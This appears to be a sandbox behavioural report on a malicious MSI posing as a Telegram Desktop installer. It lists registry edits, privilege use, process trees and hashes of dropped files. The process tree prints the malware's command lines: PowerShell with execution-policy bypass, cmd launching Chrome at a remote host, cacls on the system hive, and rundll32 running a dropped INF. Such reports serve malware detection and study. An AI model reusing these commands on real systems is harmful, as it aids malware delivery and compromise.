\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\Version = "69897" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\9A7FC00C588A6FA44BE0726C586806C3 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\PackageCode = "FCCA904F0847AF74D82D963E6563FC5F" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\ProductIcon = "C:\\Windows\\Installer\\{FA8A9218-7326-4651-A12B-A1F9EE439F91}\\MTGALauncher.exe" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8129A8AF623715641AB21A9FEE34F919\AuthorizedLUAApp = "0" msiexec.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exemsiexec.exeMsiExec.exechrome.exechrome.exechrome.exepowershell.exechrome.exechrome.exechrome.exepid process 3352 powershell.exe 3352 powershell.exe 1992 powershell.exe 1992 powershell.exe 4008 powershell.exe 4008 powershell.exe 1244 powershell.exe 1244 powershell.exe 3188 msiexec.exe 3188 msiexec.exe 2640 MsiExec.exe 2640 MsiExec.exe 3176 chrome.exe 3176 chrome.exe 4356 chrome.exe 4356 chrome.exe 2504 chrome.exe 2504 chrome.exe 5020 powershell.exe 5020 powershell.exe 5020 powershell.exe 4460 chrome.exe 4460 chrome.exe 964 chrome.exe 964 chrome.exe 1160 chrome.exe 1160 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
chrome.exepid process 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exevssvc.exepowershell.exesrtasks.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 1388 msiexec.exe Token: SeIncreaseQuotaPrivilege 1388 msiexec.exe Token: SeSecurityPrivilege 3188 msiexec.exe Token: SeCreateTokenPrivilege 1388 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1388 msiexec.exe Token: SeLockMemoryPrivilege 1388 msiexec.exe Token: SeIncreaseQuotaPrivilege 1388 msiexec.exe Token: SeMachineAccountPrivilege 1388 msiexec.exe Token: SeTcbPrivilege 1388 msiexec.exe Token: SeSecurityPrivilege 1388 msiexec.exe Token: SeTakeOwnershipPrivilege 1388 msiexec.exe Token: SeLoadDriverPrivilege 1388 msiexec.exe Token: SeSystemProfilePrivilege 1388 msiexec.exe Token: SeSystemtimePrivilege 1388 msiexec.exe Token: SeProfSingleProcessPrivilege 1388 msiexec.exe Token: SeIncBasePriorityPrivilege 1388 msiexec.exe Token: SeCreatePagefilePrivilege 1388 msiexec.exe Token: SeCreatePermanentPrivilege 1388 msiexec.exe Token: SeBackupPrivilege 1388 msiexec.exe Token: SeRestorePrivilege 1388 msiexec.exe Token: SeShutdownPrivilege 1388 msiexec.exe Token: SeDebugPrivilege 1388 msiexec.exe Token: SeAuditPrivilege 1388 msiexec.exe Token: SeSystemEnvironmentPrivilege 1388 msiexec.exe Token: SeChangeNotifyPrivilege 1388 msiexec.exe Token: SeRemoteShutdownPrivilege 1388 msiexec.exe Token: SeUndockPrivilege 1388 msiexec.exe Token: SeSyncAgentPrivilege 1388 msiexec.exe Token: SeEnableDelegationPrivilege 1388 msiexec.exe Token: SeManageVolumePrivilege 1388 msiexec.exe Token: SeImpersonatePrivilege 1388 msiexec.exe Token: SeCreateGlobalPrivilege 1388 msiexec.exe Token: SeBackupPrivilege 4628 vssvc.exe Token: SeRestorePrivilege 4628 vssvc.exe Token: SeAuditPrivilege 4628 vssvc.exe Token: SeBackupPrivilege 3188 msiexec.exe Token: SeRestorePrivilege 3188 msiexec.exe Token: SeRestorePrivilege 3188 msiexec.exe Token: SeTakeOwnershipPrivilege 3188 msiexec.exe Token: SeRestorePrivilege 3188 msiexec.exe Token: SeTakeOwnershipPrivilege 3188 msiexec.exe Token: SeRestorePrivilege 3188 msiexec.exe Token: SeTakeOwnershipPrivilege 3188 msiexec.exe Token: SeRestorePrivilege 3188 msiexec.exe Token: SeTakeOwnershipPrivilege 3188 msiexec.exe Token: SeRestorePrivilege 3188 msiexec.exe Token: SeTakeOwnershipPrivilege 3188 msiexec.exe Token: SeRestorePrivilege 3188 msiexec.exe Token: SeTakeOwnershipPrivilege 3188 msiexec.exe Token: SeDebugPrivilege 3352 powershell.exe Token: SeBackupPrivilege 4968 srtasks.exe Token: SeRestorePrivilege 4968 srtasks.exe Token: SeSecurityPrivilege 4968 srtasks.exe Token: SeTakeOwnershipPrivilege 4968 srtasks.exe Token: SeBackupPrivilege 4968 srtasks.exe Token: SeRestorePrivilege 4968 srtasks.exe Token: SeSecurityPrivilege 4968 srtasks.exe Token: SeTakeOwnershipPrivilege 4968 srtasks.exe Token: SeRestorePrivilege 3188 msiexec.exe Token: SeTakeOwnershipPrivilege 3188 msiexec.exe Token: SeDebugPrivilege 1992 powershell.exe Token: SeRestorePrivilege 3188 msiexec.exe Token: SeTakeOwnershipPrivilege 3188 msiexec.exe Token: SeDebugPrivilege 4008 powershell.exe -
Suspicious use of FindShellTrayWindow 44 IoCs
Processes:
msiexec.exechrome.exepid process 1388 msiexec.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 1388 msiexec.exe -
Suspicious use of SendNotifyMessage 40 IoCs
Processes:
chrome.exepid process 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe 2504 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.exeMsiExec.exeMsiExec.execmd.execmd.execmd.exechrome.execmd.exechrome.exedescription pid process target process PID 3188 wrote to memory of 4968 3188 msiexec.exe srtasks.exe PID 3188 wrote to memory of 4968 3188 msiexec.exe srtasks.exe PID 3188 wrote to memory of 4328 3188 msiexec.exe MsiExec.exe PID 3188 wrote to memory of 4328 3188 msiexec.exe MsiExec.exe PID 3188 wrote to memory of 4328 3188 msiexec.exe MsiExec.exe PID 4328 wrote to memory of 3352 4328 MsiExec.exe powershell.exe PID 4328 wrote to memory of 3352 4328 MsiExec.exe powershell.exe PID 4328 wrote to memory of 3352 4328 MsiExec.exe powershell.exe PID 4328 wrote to memory of 1992 4328 MsiExec.exe powershell.exe PID 4328 wrote to memory of 1992 4328 MsiExec.exe powershell.exe PID 4328 wrote to memory of 1992 4328 MsiExec.exe powershell.exe PID 4328 wrote to memory of 4008 4328 MsiExec.exe powershell.exe PID 4328 wrote to memory of 4008 4328 MsiExec.exe powershell.exe PID 4328 wrote to memory of 4008 4328 MsiExec.exe powershell.exe PID 4328 wrote to memory of 1244 4328 MsiExec.exe powershell.exe PID 4328 wrote to memory of 1244 4328 MsiExec.exe powershell.exe PID 4328 wrote to memory of 1244 4328 MsiExec.exe powershell.exe PID 3188 wrote to memory of 2640 3188 msiexec.exe MsiExec.exe PID 3188 wrote to memory of 2640 3188 msiexec.exe MsiExec.exe PID 3188 wrote to memory of 2640 3188 msiexec.exe MsiExec.exe PID 2640 wrote to memory of 4548 2640 MsiExec.exe cmd.exe PID 2640 wrote to memory of 4548 2640 MsiExec.exe cmd.exe PID 2640 wrote to memory of 4548 2640 MsiExec.exe cmd.exe PID 4548 wrote to memory of 4748 4548 cmd.exe chcp.com PID 4548 wrote to memory of 4748 4548 cmd.exe chcp.com PID 4548 wrote to memory of 4748 4548 cmd.exe chcp.com PID 2640 wrote to memory of 2404 2640 MsiExec.exe cmd.exe PID 2640 wrote to memory of 2404 2640 MsiExec.exe cmd.exe PID 2640 wrote to memory of 2404 2640 MsiExec.exe cmd.exe PID 3188 wrote to memory of 3816 3188 msiexec.exe cmd.exe PID 3188 wrote to memory of 3816 3188 msiexec.exe cmd.exe PID 3816 wrote to memory of 1680 3816 cmd.exe cmd.exe PID 3816 wrote to memory of 1680 3816 cmd.exe cmd.exe PID 1680 wrote to memory of 2184 1680 cmd.exe chrome.exe PID 1680 wrote to memory of 2184 1680 cmd.exe chrome.exe PID 3816 wrote to memory of 4828 3816 cmd.exe cmd.exe PID 3816 wrote to memory of 4828 3816 cmd.exe cmd.exe PID 2184 wrote to memory of 216 2184 chrome.exe chrome.exe PID 2184 wrote to memory of 216 2184 chrome.exe chrome.exe PID 4828 wrote to memory of 2504 4828 cmd.exe chrome.exe PID 4828 wrote to memory of 2504 4828 cmd.exe chrome.exe PID 2504 wrote to memory of 2268 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 2268 2504 chrome.exe chrome.exe PID 3816 wrote to memory of 2900 3816 cmd.exe cacls.exe PID 3816 wrote to memory of 2900 3816 cmd.exe cacls.exe PID 3816 wrote to memory of 4932 3816 cmd.exe timeout.exe PID 3816 wrote to memory of 4932 3816 cmd.exe timeout.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe PID 2504 wrote to memory of 4772 2504 chrome.exe chrome.exe
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I "C:\Users\Admin\AppData\Local\Temp\Telegram Desktop (19).msi"1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 21F305B64C4B2C86E4DDCC38AAF346822⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss8FAA.ps1"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssE58F.ps1"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssEB7E.ps1"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssF1DB.ps1"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss775B.ps1"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 18FEAF93D7F0DD3B71BF5CE9035A7BFE E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C "C:\Users\Admin\AppData\Local\Temp\{1D2A053B-04E8-4CC7-9371-50EBAAABEB61}.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
-
C:\Windows\SysWOW64\cmd.exe/C "C:\Users\Admin\AppData\Local\Temp\{1D2A053B-04E8-4CC7-9371-50EBAAABEB61}.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files\Wizards of the Coast\MTGA\installgta.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c start /b chrome.exe https://clodtechnology.com/yy28i5/index/b1/?servername=msi3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://clodtechnology.com/yy28i5/index/b1/?servername=msi4⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffee71d4f50,0x7ffee71d4f60,0x7ffee71d4f705⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1680,13185303285010554810,9523423208102672651,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1728 /prefetch:25⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1680,13185303285010554810,9523423208102672651,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2044 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c start /b chrome.exe https://clodtechnology.com/yy28i5/index/b2/?servername=msi3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://clodtechnology.com/yy28i5/index/b2/?servername=msi4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee71d4f50,0x7ffee71d4f60,0x7ffee71d4f705⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1656 /prefetch:25⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1752 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2240 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2912 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4064 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3196 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4948 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3128 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4264 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3168 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3064 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3148 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2928 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,11002933576575929214,11608773449565397008,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3196 /prefetch:85⤵
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"3⤵
-
C:\Windows\system32\timeout.exetimeout 53⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.execmd /c rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 C:\Users\Admin\AppData\Roaming\b2.inf3⤵
-
C:\Windows\system32\rundll32.exerundll32.exe setupapi,InstallHinfSection DefaultInstall 132 C:\Users\Admin\AppData\Roaming\b2.inf4⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"1⤵
- Drops file in Program Files directory
-
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir1048_807589028\ChromeRecovery.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir1048_807589028\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={957a9ea4-6f99-4eb4-875a-da089c9b5caf} --system2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Wizards of the Coast\MTGA\MonoBleedingEdge\EmbedRuntime\MonoPosixHelper.dllFilesize
762KB
MD540f1b270e739cb0e23ca8151fb93bcd7
SHA1fa314973f6b93360901f8f3edeb47c1d51576250
SHA25627fea7265dacaffda50d852e8f99a16813011bdc9f889f9c7da5e8efbbad498b
SHA512d6e418093fbf58cfbc186daf38016edcdda3343cfd4ae77af3cfd4f65ca73868630760d6287f5583fc4826fcf98d1beaf7fdd03b90f6b80c3084c82577bbdeb9
-
C:\Program Files\Wizards of the Coast\MTGA\MonoBleedingEdge\EmbedRuntime\mono-2.0-bdwgc.dllFilesize
4.7MB
MD54ee160f68424bb5581f6468d202810c1
SHA15017e58f5316facca5fc6b666f06e7b71f842fe1
SHA256e36fb081b1335a316aea0eeea150db734298f95ad323e255de9490457a3b88bb
SHA51220c14a86d3e9e28a4a076c64811f8cc209776807696024f40b526c33a0a19715c35c8ea2eb8894be025b3f2ec850ae07d0b6ad87ed66494f37faad03f28ceb36
-
C:\Program Files\Wizards of the Coast\MTGA\MonoBleedingEdge\etc\mono\2.0\Browsers\Compat.browserFilesize
1KB
MD50d831c1264b5b32a39fa347de368fe48
SHA1187dff516f9448e63ea5078190b3347922c4b3eb
SHA2568a1082057ac5681dcd4e9c227ed7fb8eb42ac1618963b5de3b65739dd77e2741
SHA5124b7549eda1f8ed2c4533d056b62ca5030445393f9c6003e5ee47301ff7f44b4bd5022b74d54f571aa890b6e4593c6eded1a881500ac5ba2a720dc0ff280300af
-
C:\Program Files\Wizards of the Coast\MTGA\MonoBleedingEdge\etc\mono\2.0\DefaultWsdlHelpGenerator.aspxFilesize
59KB
MD5f7be9f1841ff92f9d4040aed832e0c79
SHA1b3e4b508aab3cf201c06892713b43ddb0c43b7ae
SHA256751861040b69ea63a3827507b7c8da9c7f549dc181c1c8af4b7ca78cc97d710a
SHA512380e97f7c17ee0fdf6177ed65f6e30de662a33a8a727d9f1874e9f26bd573434c3dedd655b47a21b998d32aaa72a0566df37e901fd6c618854039d5e0cbef3f5
-
C:\Program Files\Wizards of the Coast\MTGA\MonoBleedingEdge\etc\mono\2.0\machine.configFilesize
28KB
MD5cad24142abba464dd90777c3d347ef88
SHA1d8db7111fce5a08d8b7c9a6e1e0ad2fbf34cfe12
SHA256edc5bcf685d930a607bc097927260a3f9ac7f52dd809db68158298bfd934b7ce
SHA5125d3ee2ee7921c95cc30790ae670fcadcf091d4fa1b9b5e1b9c7500c67230abe25467236ed160c51aa662e764ccea10e4955887359a65b09432b727abf27f8454
-
C:\Program Files\Wizards of the Coast\MTGA\MonoBleedingEdge\etc\mono\2.0\settings.mapFilesize
2KB
MD522c818a23169e12bd3c8587b6394c731
SHA1dd2be2dbccd34736719301aee92429d4258ea5a0
SHA25649c6160f9d54af4270a3b4e997fc4a8301f79b9e2070118fa46ddbcbbc44f9a2
SHA512c1352e817e01277413a1790a94a4f979dc1b8333874fef28d735441c034c97bf8ce501fd9cd04c47d25541a0c1d54fcd4dd3bee9ac3e8fbde83ada9a1d2662d7
-
C:\Program Files\Wizards of the Coast\MTGA\MonoBleedingEdge\etc\mono\2.0\web.configFilesize
11KB
MD52b6303c4f12762b71051db6e947f90a4
SHA1a4d7e05516f63d6ab67327b299d4fb2852cb840b
